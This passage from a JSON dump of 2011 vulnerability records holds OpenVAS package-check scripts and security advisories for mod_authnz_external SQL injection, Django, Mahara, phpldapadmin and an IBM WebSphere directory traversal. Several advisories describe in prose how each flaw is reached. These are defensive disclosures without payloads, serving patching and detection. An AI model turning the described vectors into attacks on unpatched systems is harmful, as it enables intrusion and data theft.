$\");\n script_tag(name:\"creation_date\", value:\"2011-08-03 04:36:20 +0200 (Wed, 03 Aug 
2011)\");\n script_cve_id(\"CVE-2011-2688\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 2279-1 (libapache2-mod-authnz-external)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-authnz-external\", ver:\"3.2.4-2+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:47", "description": "The remote host is missing an update to libapache2-mod-authnz-external\nannounced via advisory DSA 2279-1.", "cvss3": {}, "published": "2011-08-03T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2279-1 (libapache2-mod-authnz-external)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2688"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:136141256231069988", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231069988", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2279_1.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Description: Auto-generated from advisory 
DSA 2279-1 (libapache2-mod-authnz-external)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.69988\");\n script_version(\"$Revision: 14275 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-03 04:36:20 +0200 (Wed, 03 Aug 2011)\");\n script_cve_id(\"CVE-2011-2688\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 2279-1 (libapache2-mod-authnz-external)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB6\");\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202279-1\");\n script_tag(name:\"insight\", value:\"It was discovered that libapache2-mod-authnz-external, an apache\nauthentication module, is prone to an SQL injection via the $user\nparameter.\n\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 3.2.4-2+squeeze1.\n\nThe oldstable distribution (lenny) does not contain\nlibapache2-mod-authnz-external\n\nFor the testing distribution (wheezy), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 3.2.4-2.1.\");\n\n script_tag(name:\"solution\", value:\"We recommend that you upgrade your libapache2-mod-authnz-external packages.\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update to libapache2-mod-authnz-external\nannounced via advisory DSA 2279-1.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libapache2-mod-authnz-external\", ver:\"3.2.4-2+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2021-10-22T00:10:54", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2332-1 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nOctober 29, 2011 http://www.debian.org/security/faq\n- 
-------------------------------------------------------------------------\n\nPackage : python-django\nVulnerability : several issues\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2011-4136 CVE-2011-4137 CVE-2011-4138 CVE-2011-4139 \n CVE-2011-4140 \nDebian Bug : 641405\n\nPaul McMillan, Mozilla and the Django core team discovered several\nvulnerabilities in Django, a Python web framework:\n\nCVE-2011-4136\n\n When using memory-based sessions and caching, Django sessions are\n stored directly in the root namespace of the cache. When user data is\n stored in the same cache, a remote user may take over a session.\n\nCVE-2011-4137, CVE-2011-4138\n\n Django's field type URLfield by default checks supplied URLs by\n issuing a request to it, which doesn't time out. A Denial of Service\n is possible by supplying specially prepared URLs that keep the\n connection open indefinitely or fill the Django server's memory.\n\nCVE-2011-4139\n\n Django used X-Forwarded-Host headers to construct full URLs. 
This\n header may not contain trusted input and could be used to poison the\n cache.\n\nCVE-2011-4140\n\n The CSRF protection mechanism in Django does not properly handle\n web-server configurations supporting arbitrary HTTP Host headers,\n which allows remote attackers to trigger unauthenticated forged\n requests.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.0.2-1+lenny3.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.2.3-3+squeeze2.\n\nFor the testing (wheezy) and unstable distribution (sid), this problem\nhas been fixed in version 1.3.1-1.\n\nWe recommend that you upgrade your python-django packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2011-10-29T05:50:53", "type": "debian", "title": "[SECURITY] [DSA 2332-1] python-django security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4136", "CVE-2011-4137", "CVE-2011-4138", "CVE-2011-4139", "CVE-2011-4140"], "modified": "2011-10-29T05:50:53", "id": "DEBIAN:DSA-2332-1:3B784", "href": "https://lists.debian.org/debian-security-announce/2011/msg00209.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-22T00:10:46", "description": "- 
-------------------------------------------------------------------------\nDebian Security Advisory DSA-2334-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nNovember 04, 2011 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : mahara\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2011-2771 CVE-2011-2772 CVE-2011-2773 \n\nSeveral vulnerabilities were discovered in Mahara, an electronic \nportfolio, weblog, and resume builder:\n\nCVE-2011-2771\n\n Teemu Vesala discovered that missing input sanitising of RSS\n feeds could lead to cross-site scripting.\n\nCVE-2011-2772\n \n Richard Mansfield discovered that insufficient upload restrictions\n allowed denial of service.\n\nCVE-2011-2773\n\n Richard Mansfield discovered that the management of institutions was prone to\n cross-site request forgery.\n\n(no CVE ID available yet)\n\n Andrew Nichols discovered a privilege escalation vulnerability\n in MNet handling.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.0.4-4+lenny11.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.2.6-2+squeeze3.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.4.1-1.\n\nWe recommend that you upgrade your mahara packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2011-11-04T17:51:14", "type": "debian", "title": "[SECURITY] [DSA 2334-1] mahara security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": 
"PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2771", "CVE-2011-2772", "CVE-2011-2773"], "modified": "2011-11-04T17:51:14", "id": "DEBIAN:DSA-2334-1:F6AD0", "href": "https://lists.debian.org/debian-security-announce/2011/msg00211.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-22T00:10:51", "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA-2333-1 security@debian.org\nhttp://www.debian.org/security/ Jonathan Wiltshire\nOct 31th, 2011 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : phpldapadmin\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nDebian bug : 646754\nCVE IDs : CVE-2011-4075 CVE-2011-4074\n\nTwo vulnerabilities have been discovered in phpldapadmin, a web based\ninterface for administering LDAP servers. The Common Vulnerabilities and\nExposures project identifies the following problems:\n\nCVE-2011-4074\n\n Input appended to the URL in cmd.php (when "cmd" is set to "_debug") is\n not properly sanitised before being returned to the user. This can be\n exploited to execute arbitrary HTML and script code in a user's browser\n session in context of an affected site.\n\nCVE-2011-4075\n\n Input passed to the "orderby" parameter in cmd.php (when "cmd" is set to\n "query_engine", "query" is set to "none", and "search" is set to e.g.\n "1") is not properly sanitised in lib/functions.php before being used in a\n "create_function()" function call. 
This can be exploited to inject and\n execute arbitrary PHP code.\n\n\nFor the oldstable distribution (lenny), these problems have been fixed in\nversion 1.1.0.5-6+lenny2.\n\nFor the stable distribution (squeeze), these problems have been fixed in\nversion 1.2.0.5-2+squeeze1.\n\nFor the testing distribution (wheezy), these problems will be fixed soon.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.2.0.5-2.1.\n\nWe recommend that you upgrade your phpldapadmin packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2011-10-30T12:29:53", "type": "debian", "title": "[SECURITY] [DSA 2333-1] phpldapadmin security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4074", "CVE-2011-4075"], "modified": "2011-10-30T12:29:53", "id": "DEBIAN:DSA-2333-1:270B2", "href": "https://lists.debian.org/debian-security-announce/2011/msg00210.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-04T02:08:00", "description": "Amaya Rodrigo uploaded new packages for libapache2-mod-authnz-external\nwhich fixed the following security problems:\n\nCVE-2011-2688 \n\tRemotely exploitable SQL injection in the mysql auth module.\n\nFor the lenny-backports distribution the problems have been fixed in\nversion 
3.2.4-2~bpo50+1.1.\n\nFor the stable distribution (squeeze) the problems have been fixed in\nversion 3.2.4-2.1+squeeze1.\n\nIf you don't use pinning (see [1]) you have to update the package\nmanually via "apt-get -t lenny-backports install <packagelist>" with the\npackagelist of your installed packages affected by this update.\n[1] <http://backports.debian.org/Instructions>\n\nWe recommend pinning (in /etc/apt/preferences) the backports repository\nto 200 so that new versions of installed backports will be installed\nautomatically.\n\n Package: *\n Pin: release a=lenny-backports\n Pin-Priority: 200\n", "cvss3": {}, "published": "2011-07-18T09:12:30", "type": "debian", "title": "[BSA-042] Security Update for libapache2-mod-authnz-external", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2688"], "modified": "2011-07-18T09:12:30", "id": "DEBIAN:BSA-042:A3B69", "href": "https://lists.debian.org/debian-backports-announce/2011/08/msg00000.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-22T00:18:01", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2279-1 security@debian.org\nhttp://www.debian.org/security/ Steffen Joeris\nJuly 19, 2011 http://www.debian.org/security/faq\n-
-------------------------------------------------------------------------\n\nPackage : libapache2-mod-authnz-external\nVulnerability : SQL injection\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2011-2688 \nDebian Bug : 633637\n\nIt was discovered that libapache2-mod-authnz-external, an Apache\nauthentication module, is prone to an SQL injection via the $user\nparameter.\n\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 3.2.4-2+squeeze1.\n\nThe oldstable distribution (lenny) does not contain\nlibapache2-mod-authnz-external\n\nFor the testing distribution (wheezy), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 3.2.4-2.1.\n\n\nWe recommend that you upgrade your libapache2-mod-authnz-external packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2011-07-19T00:49:15", "type": "debian", "title": "[SECURITY] [DSA 2279-1] libapache2-mod-authnz-external security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2688"], "modified": "2011-07-19T00:49:15", "id": "DEBIAN:DSA-2279-1:127D6", "href": "https://lists.debian.org/debian-security-announce/2011/msg00153.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen":
"2022-01-04T13:09:01", "description": "Pall McMillan discovered that Django used the root namespace when storing \ncached session data. A remote attacker could exploit this to modify \nsessions. (CVE-2011-4136)\n\nPaul McMillan discovered that Django would not timeout on arbitrary URLs \nwhen the application used URLFields. This could be exploited by a remote \nattacker to cause a denial of service via resource exhaustion. \n(CVE-2011-4137)\n\nPaul McMillan discovered that while Django would check the validity of a \nURL via a HEAD request, it would instead use a GET request for the target \nof a redirect. This could potentially be used to trigger arbitrary GET \nrequests via a crafted Location header. (CVE-2011-4138)\n\nIt was discovered that Django would sometimes use a request's HTTP Host \nheader to construct a full URL. A remote attacker could exploit this to \nconduct host header cache poisoning attacks via a crafted request. \n(CVE-2011-4139)\n", "cvss3": {}, "published": "2011-12-09T00:00:00", "type": "ubuntu", "title": "Django vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4136", "CVE-2011-4138", "CVE-2011-4139", "CVE-2011-4137"], "modified": "2011-12-09T00:00:00", "id": "USN-1297-1", "href": "https://ubuntu.com/security/notices/USN-1297-1", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:42", "bulletinFamily": "software", "cvelist": ["CVE-2011-2773", "CVE-2011-2772", "CVE-2011-2771"], "description": 
"-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-2334-1 security@debian.org\r\nhttp://www.debian.org/security/ Moritz Muehlenhoff\r\nNovember 04, 2011 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : mahara\r\nVulnerability : several\r\nProblem type : remote\r\nDebian-specific: no\r\nCVE ID : CVE-2011-2771 CVE-2011-2772 CVE-2011-2773 \r\n\r\nSeveral vulnerabilities were discovered in Mahara, an electronic \r\nportfolio, weblog, and resume builder:\r\n\r\nCVE-2011-2771\r\n\r\n Teemu Vesala discovered that missing input sanitising of RSS\r\n feeds could lead to cross-site scripting.\r\n\r\nCVE-2011-2772\r\n \r\n Richard Mansfield discovered that insufficient upload restrictions\r\n allowed denial of service.\r\n\r\nCVE-2011-2773\r\n\r\n Richard Mansfield that the management of institutions was prone to\r\n cross-site request forgery.\r\n\r\n(no CVE ID available yet)\r\n\r\n Andrew Nichols discovered a privilege escalation vulnerability\r\n in MNet handling.\r\n\r\nFor the oldstable distribution (lenny), this problem has been fixed in\r\nversion 1.0.4-4+lenny11.\r\n\r\nFor the stable distribution (squeeze), this problem has been fixed in\r\nversion 1.2.6-2+squeeze3.\r\n\r\nFor the unstable distribution (sid), this problem has been fixed in\r\nversion 1.4.1-1.\r\n\r\nWe recommend that you upgrade your mahara packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: http://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.11 (GNU/Linux)\r\n\r\niEYEARECAAYFAk60JbcACgkQXm3vHE4uylqocwCgkWMz4J7ZDTxntTrLf0iYmfAZ\r\nwGUAoLG1TDXaqNB+YgJcTuYqKpkTD8y5\r\n=4JlU\r\n-----END PGP 
SIGNATURE-----\r\n", "edition": 1, "modified": "2011-11-06T00:00:00", "published": "2011-11-06T00:00:00", "id": "SECURITYVULNS:DOC:27278", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27278", "title": "[SECURITY] [DSA 2334-1] mahara security update", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:42", "bulletinFamily": "software", "cvelist": ["CVE-2011-1359"], "description": "Title\r\n-----\r\nDDIVRT-2011-33 IBM WebSphere Application Server 'help' Servlet Plug-in Bundle Directory Traversal [CVE-2011-1359]\r\n\r\nSeverity\r\n--------\r\nHigh\r\n\r\nDate Discovered\r\n---------------\r\nJuly 28, 2011\r\n\r\nDiscovered By\r\n-------------\r\nDigital Defense, Inc. Vulnerability Research Team\r\nCredit: Javier Castro, sxkeebler and r@b13$\r\n\r\nVulnerability Description\r\n-------------------------\r\nThe default installation of the IBM WebSphere Application Server is \r\ndeployed with a 'help' servlet which is designed to serve supporting \r\ndocumentation for the WebSphere system. When the 'help' servlet \r\nprocesses a URL that contains a reference to a Java plug-in Bundle \r\nthat is registered with the Eclipse Platform Runtime Environment of \r\nthe WebSphere Application Server, the 'help' servlet fails to ensure \r\nthat the submitted URL refers to a file that is both located within the \r\nweb root of the servlet and is of a type that is allowed to be served.\r\n\r\nAn unauthenticated remote attacker can use this weakness in the \r\n'help' servlet to retrieve arbitrary system files from the host that \r\nis running the 'help' servlet. This can be accomplished by submitting \r\na URL which refers to a registered Java plug-in Bundle followed by a \r\nrelative path to the desired file.\r\n\r\nSolution Description\r\n--------------------\r\nIBM has released a patch for this issue. 
The patch is available through APAR PM45322.\r\n\r\nhttp://www-01.ibm.com/support/docview.wss?uid=swg21509257\r\n\r\nTested Systems / Software (with versions)\r\n------------------------------------------\r\nWebSphere Application Server Version 8.0\r\nWebSphere Application Server Version 7.0\r\nWebSphere Application Server Version 6.1\r\n\r\nVendor Contact\r\n--------------\r\nVendor Name: IBM\r\nVendor Website: http://www-01.ibm.com/software/webservers/appserv/was/library/\r\n", "edition": 1, "modified": "2011-11-06T00:00:00", "published": "2011-11-06T00:00:00", "id": "SECURITYVULNS:DOC:27281", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27281", "title": "DDIVRT-2011-33 IBM WebSphere Application Server 'help' Servlet Plug-in Bundle Directory Traversal [CVE-2011-1359]", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:09:43", "description": "SQL injection via username.", "edition": 1, "cvss3": {}, "published": "2011-07-22T00:00:00", "title": "Apache mod_authnz_external module SQL injection", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2011-2688"], "modified": "2011-07-22T00:00:00", "id": "SECURITYVULNS:VULN:11801", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11801", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:42", "description": "- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\nGentoo Linux Security Advisory GLSA 201110-23\r\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n http://security.gentoo.org/\r\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n\r\n Severity: Low\r\n Title: Apache mod_authnz_external: SQL injection\r\n Date: October 25, 2011\r\n Bugs: #386165\r\n ID: 201110-23\r\n\r\n- - - - - - - - - - - - - - - - - - - - - - - - - 
- - - - - - - - - - -\r\n\r\nSynopsis\r\n========\r\n\r\nAn input sanitization flaw in mod_authnz_external allows remote attackers\r\nto conduct SQL injection.\r\n\r\nBackground\r\n==========\r\n\r\nmod_authnz_external is a tool for creating custom authentication\r\nbackends for HTTP basic authentication.\r\n\r\nAffected packages\r\n=================\r\n\r\n -------------------------------------------------------------------\r\n Package / Vulnerable / Unaffected\r\n -------------------------------------------------------------------\r\n 1 www-apache/mod_authnz_external\r\n < 3.2.6 >= 3.2.6 \r\n\r\nDescription\r\n===========\r\n\r\nmysql/mysql-auth.pl in mod_authnz_external does not properly sanitize\r\ninput before using it in an SQL query.\r\n\r\nImpact\r\n======\r\n\r\nA remote attacker could exploit this vulnerability to inject arbitrary\r\nSQL statements by using a specially crafted username for HTTP\r\nauthentication on a site using mod_authnz_external.\r\n\r\nWorkaround\r\n==========\r\n\r\nThere is no known workaround at this time.\r\n\r\nResolution\r\n==========\r\n\r\nAll Apache mod_authnz_external users should upgrade to the latest\r\nversion:\r\n\r\n # emerge --sync\r\n # emerge --ask --oneshot -v ">=www-apache/mod_authnz_external-3.2.6"\r\n\r\nReferences\r\n==========\r\n\r\n[ 1 ] CVE-2011-2688\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2688\r\n\r\nAvailability\r\n============\r\n\r\nThis GLSA and any updates to it are available for viewing at\r\nthe Gentoo Security Website:\r\n\r\n http://security.gentoo.org/glsa/glsa-201110-23.xml\r\n\r\nConcerns?\r\n=========\r\n\r\nSecurity is a primary focus of Gentoo Linux and ensuring the\r\nconfidentiality and security of our users' machines is of utmost\r\nimportance to us.
Any security concerns should be addressed to\r\nsecurity@gentoo.org or alternatively, you may file a bug at\r\nhttps://bugs.gentoo.org.\r\n\r\nLicense\r\n=======\r\n\r\nCopyright 2011 Gentoo Foundation, Inc; referenced text\r\nbelongs to its owner(s).\r\n\r\nThe contents of this document are licensed under the\r\nCreative Commons - Attribution / Share Alike license.\r\n\r\nhttp://creativecommons.org/licenses/by-sa/2.5", "edition": 1, "cvss3": {}, "published": "2011-11-06T00:00:00", "title": "[ GLSA 201110-23 ] Apache mod_authnz_external: SQL injection", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2011-2688"], "modified": "2011-11-06T00:00:00", "id": "SECURITYVULNS:DOC:27267", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27267", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:41", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-2279-1 security@debian.org\r\nhttp://www.debian.org/security/ Steffen Joeris\r\nJuly 19, 2011 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : libapache2-mod-authnz-external\r\nVulnerability : SQL injection\r\nProblem type : remote\r\nDebian-specific: no\r\nCVE ID : CVE-2011-2688 \r\nDebian Bug : 633637\r\n\r\nIt was discovered that libapache2-mod-authnz-external, an Apache\r\nauthentication module, is prone to an SQL injection via the $user\r\nparameter.\r\n\r\n\r\nFor the stable distribution (squeeze), this problem has been fixed in\r\nversion 3.2.4-2+squeeze1.\r\n\r\nThe oldstable distribution (lenny) does not contain\r\nlibapache2-mod-authnz-external\r\n\r\nFor the testing distribution (wheezy), this problem will be fixed soon.\r\n\r\nFor the unstable distribution (sid), this problem has been
fixed in\r\nversion 3.2.4-2.1.\r\n\r\n\r\nWe recommend that you upgrade your libapache2-mod-authnz-external packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: http://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.11 (GNU/Linux)\r\n\r\niEYEARECAAYFAk4k068ACgkQ62zWxYk/rQdEcACgl9otukAtTDPLIWRr8b7JlbCn\r\ngKYAniArSm7L6ND92ROY1fVsDgiKXD7R\r\n=07Sp\r\n-----END PGP SIGNATURE-----\r\n\r\n\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2011-07-22T00:00:00", "title": "[SECURITY] [DSA 2279-1] libapache2-mod-authnz-external security update", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2011-2688"], "modified": "2011-07-22T00:00:00", "id": "SECURITYVULNS:DOC:26677", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26677", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:50", "description": "PhpLDAPadmin is a web-based LDAP client. It provides easy, anywhere-accessible, multi-language administration for your LDAP server. Its hierarchical tree-viewer and advanced search functionality make it intuitive to browse and administer your LDAP directory. Since it is a web application, this LDAP browser works on many platforms, making your LDAP server easily manageable from any location. PhpLDAPadmin is the perfect LDAP browser for the LDAP professional and novice alike. Its user base consists mostly of LDAP administration professionals. Edit /etc/phpldapadmin/config.php to change default (localhost) LDAP server location and other things. Edit 